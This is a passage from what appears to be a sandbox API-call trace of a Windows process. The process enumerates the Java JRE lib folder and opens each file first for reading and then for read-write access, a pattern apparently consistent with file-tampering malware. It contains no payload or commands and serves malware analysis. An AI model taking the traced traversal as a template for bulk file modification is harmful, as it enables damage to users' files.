Files\\Java\\jre1.8.0_144\\lib\\hijrah-config-umalqura.properties") returned 73 [0096.910] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\hijrah-config-umalqura.properties" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\hijrah-config-umalqura.properties"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x418 [0096.911] GetFileType (hFile=0x418) returned 0x1 [0096.911] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x859e0 | out: hHeap=0x20000) returned 1 [0096.911] SetFilePointerEx (in: hFile=0x418, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0096.911] SetFilePointerEx (in: hFile=0x418, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0096.911] SetFilePointerEx (in: hFile=0x418, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0096.911] CloseHandle (hObject=0x418) returned 1 [0096.911] AreFileApisANSI () returned 1 [0096.911] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d370, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 73 [0096.911] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x92) returned 0x85120 [0096.911] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d370, cbMultiByte=-1, lpWideCharStr=0x85120, cchWideChar=73 | out: lpWideCharStr="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\hijrah-config-umalqura.properties") returned 73 [0096.912] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\hijrah-config-umalqura.properties" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\hijrah-config-umalqura.properties"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x418 [0096.912] GetFileType (hFile=0x418) returned 0x1 [0096.912] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x85120 | out: hHeap=0x20000) returned 1 [0096.912] CloseHandle (hObject=0x418) returned 1 [0096.912] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0096.912] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0096.912] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0096.912] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0096.912] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0096.912] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0096.912] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0096.912] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0096.912] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0096.912] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0096.912] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0096.912] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0096.912] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0096.912] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0096.912] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0096.912] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0096.912] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d0b0 [0096.912] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d6e0 [0096.912] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d108 [0096.912] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d738 [0096.912] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d108 | out: hHeap=0x20000) returned 1 [0096.912] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d6e0 | out: hHeap=0x20000) returned 1 [0096.912] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d0b0 | out: hHeap=0x20000) returned 1 [0096.912] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d738 | out: hHeap=0x20000) returned 1 [0096.913] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d1b8 [0096.913] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d420 [0096.913] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d058 [0096.913] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d6e0 [0096.913] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d058 | out: hHeap=0x20000) returned 1 [0096.913] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d420 | out: hHeap=0x20000) returned 1 [0096.913] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d1b8 | out: hHeap=0x20000) returned 1 [0096.913] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d738 [0096.913] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d6e0 | out: hHeap=0x20000) returned 1 [0096.913] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6cfa8 [0096.913] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d738 | out: hHeap=0x20000) returned 1 [0096.913] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0096.913] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0096.913] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0096.913] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0096.913] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0096.913] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0096.913] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0096.913] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6cfa8 | out: hHeap=0x20000) returned 1 [0096.913] AreFileApisANSI () returned 1 [0096.913] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d370, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 73 [0096.913] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x92) returned 0x85b20 [0096.913] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d370, cbMultiByte=-1, lpWideCharStr=0x85b20, cchWideChar=73 | out: lpWideCharStr="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\hijrah-config-umalqura.properties") returned 73 [0096.913] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\hijrah-config-umalqura.properties" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\hijrah-config-umalqura.properties"), fInfoLevelId=0x0, lpFileInformation=0x313f6c0 | out: lpFileInformation=0x313f6c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa8c2a9b3, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xa8c2a9b3, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0xa8c2a9b3, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0x368a)) returned 1 [0096.913] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x85b20 | out: hHeap=0x20000) returned 1 [0096.913] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0096.913] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d080 | out: hHeap=0x20000) returned 1 [0096.913] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfe0 | out: hHeap=0x20000) returned 1 [0096.913] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d370 | out: hHeap=0x20000) returned 1 [0096.913] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0096.913] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0096.913] FindNextFileW (in: hFindFile=0x78150, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xa8c2a9b3, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xa12313ee, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xa8c2a9b3, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="images", cAlternateFileName="")) returned 1 [0096.913] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf00 [0096.913] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x34f90 [0096.913] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf00 | out: hHeap=0x20000) returned 1 [0096.913] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x34f90 | out: hHeap=0x20000) returned 1 [0096.913] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d050 [0096.914] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x34f90 [0096.914] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d050 | out: hHeap=0x20000) returned 1 [0096.914] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x34f90 | out: hHeap=0x20000) returned 1 [0096.914] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d058 [0096.914] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x76) returned 0x6a3b0 [0096.914] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d058 | out: hHeap=0x20000) returned 1 [0096.914] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71550 [0096.914] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6a3b0 | out: hHeap=0x20000) returned 1 [0096.914] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0096.914] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0096.914] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0096.914] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0096.914] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71550 | out: hHeap=0x20000) returned 1 [0096.914] AreFileApisANSI () returned 1 [0096.914] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\images", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\images", lpUsedDefaultChar=0x0) returned 46 [0096.914] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df50 [0096.914] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0096.914] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0096.914] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf00 [0096.914] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf10 [0096.914] AreFileApisANSI () returned 1 [0096.914] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4df50, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 46 [0096.914] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x5c) returned 0x71688 [0096.914] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4df50, cbMultiByte=-1, lpWideCharStr=0x71688, cchWideChar=46 | out: lpWideCharStr="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\images") returned 46 [0096.914] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\images" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\images"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0096.914] GetLastError () returned 0x5 [0096.914] GetLastError () returned 0x5 [0096.915] SetLastError (dwErrCode=0x5) [0096.915] GetLastError () returned 0x5 [0096.915] SetLastError (dwErrCode=0x5) [0096.915] GetLastError () returned 0x5 [0096.915] SetLastError (dwErrCode=0x5) [0096.915] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71688 | out: hHeap=0x20000) returned 1 [0096.915] AreFileApisANSI () returned 1 [0096.915] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4df50, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 46 [0096.915] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x5c) returned 0x71bd0 [0096.915] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4df50, cbMultiByte=-1, lpWideCharStr=0x71bd0, cchWideChar=46 | out: lpWideCharStr="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\images") returned 46 [0096.915] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\images" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\images"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0096.915] GetLastError () returned 0x5 [0096.915] GetLastError () returned 0x5 [0096.915] SetLastError (dwErrCode=0x5) [0096.915] GetLastError () returned 0x5 [0096.915] SetLastError (dwErrCode=0x5) [0096.915] GetLastError () returned 0x5 [0096.915] SetLastError (dwErrCode=0x5) [0096.915] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71bd0 | out: hHeap=0x20000) returned 1 [0096.915] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf10 | out: hHeap=0x20000) returned 1 [0096.915] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf00 | out: hHeap=0x20000) returned 1 [0096.915] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df50 | out: hHeap=0x20000) returned 1 [0096.915] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0096.915] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0096.915] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0096.915] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0096.915] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d2c0 [0096.915] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x76) returned 0x6a9b0 [0096.916] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d2c0 | out: hHeap=0x20000) returned 1 [0096.916] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71bd0 [0096.916] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6a9b0 | out: hHeap=0x20000) returned 1 [0096.916] FindNextFileW (in: hFindFile=0x78150, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa8c50c02, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xa8c50c02, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0xa8c50c02, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0x38, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="javafx.properties", cAlternateFileName="JAVAFX~1.PRO")) returned 1 [0096.916] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0096.916] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e068 [0096.916] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0096.916] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e0d8 [0096.916] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4de00 [0096.916] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df50 [0096.916] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4de00 | out: hHeap=0x20000) returned 1 [0096.916] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e0d8 | out: hHeap=0x20000) returned 1 [0096.916] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e068 | out: hHeap=0x20000) returned 1 [0096.916] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df50 | out: hHeap=0x20000) returned 1 [0096.916] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf20 [0096.916] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x35210 [0096.916] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71960 [0096.916] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71688 [0096.916] FindFirstFileExW (in: lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\images\\*", fInfoLevelId=0x0, lpFindFileData=0x313ef40, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x0 | out: lpFindFileData=0x313ef40) returned 0x77fd0 [0096.916] FindNextFileW (in: hFindFile=0x77fd0, lpFindFileData=0x313ecc4 | out: lpFindFileData=0x313ecc4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xa8c2a9b3, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xa12313ee, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xa8c2a9b3, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0096.916] FindNextFileW (in: hFindFile=0x77fd0, lpFindFileData=0x313ecc4 | out: lpFindFileData=0x313ecc4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xa8c2a9b3, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xa129361a, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xa8c50c02, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="cursors", cAlternateFileName="")) returned 1 [0096.916] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71688 | out: hHeap=0x20000) returned 1 [0096.916] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71b68 [0096.916] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x68) returned 0x46828 [0096.916] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71bd0 | out: hHeap=0x20000) returned 1 [0096.916] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cfe0 [0096.916] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x34fd0 [0096.916] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfe0 | out: hHeap=0x20000) returned 1 [0096.916] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x34fd0 | out: hHeap=0x20000) returned 1 [0096.917] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d080 [0096.917] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x35230 [0096.917] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d080 | out: hHeap=0x20000) returned 1 [0096.917] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x35230 | out: hHeap=0x20000) returned 1 [0096.917] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x715b8 [0096.917] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8e) returned 0x8a5c8 [0096.917] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x715b8 | out: hHeap=0x20000) returned 1 [0096.917] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x76200 [0096.917] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8a5c8 | out: hHeap=0x20000) returned 1 [0096.917] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0096.917] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0096.917] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0096.917] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0096.917] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x76200 | out: hHeap=0x20000) returned 1 [0096.917] AreFileApisANSI () returned 1 [0096.917] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\images\\cursors", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\images\\cursors", lpUsedDefaultChar=0x0) returned 54 [0096.917] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53370 [0096.917] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0096.917] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0096.917] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d050 [0096.917] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d080 [0096.917] AreFileApisANSI () returned 1 [0096.917] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53370, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 54 [0096.917] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x6c) returned 0x75fa8 [0096.917] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53370, cbMultiByte=-1, lpWideCharStr=0x75fa8, cchWideChar=54 | out: lpWideCharStr="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\images\\cursors") returned 54 [0096.917] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\images\\cursors" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\images\\cursors"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0096.917] GetLastError () returned 0x5 [0096.917] GetLastError () returned 0x5 [0096.918] SetLastError (dwErrCode=0x5) [0096.918] GetLastError () returned 0x5 [0096.918] SetLastError (dwErrCode=0x5) [0096.918] GetLastError () returned 0x5 [0096.918] SetLastError (dwErrCode=0x5) [0096.918] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75fa8 | out: hHeap=0x20000) returned 1 [0096.918] AreFileApisANSI () returned 1 [0096.918] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53370, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 54 [0096.918] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x6c) returned 0x75dc8 [0096.918] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53370, cbMultiByte=-1, lpWideCharStr=0x75dc8, cchWideChar=54 | out: lpWideCharStr="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\images\\cursors") returned 54 [0096.918] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\images\\cursors" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\images\\cursors"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0096.918] GetLastError () returned 0x5 [0096.918] GetLastError () returned 0x5 [0096.918] SetLastError (dwErrCode=0x5) [0096.918] GetLastError () returned 0x5 [0096.918] SetLastError (dwErrCode=0x5) [0096.918] GetLastError () returned 0x5 [0096.918] SetLastError (dwErrCode=0x5) [0096.918] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75dc8 | out: hHeap=0x20000) returned 1 [0096.918] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d080 | out: 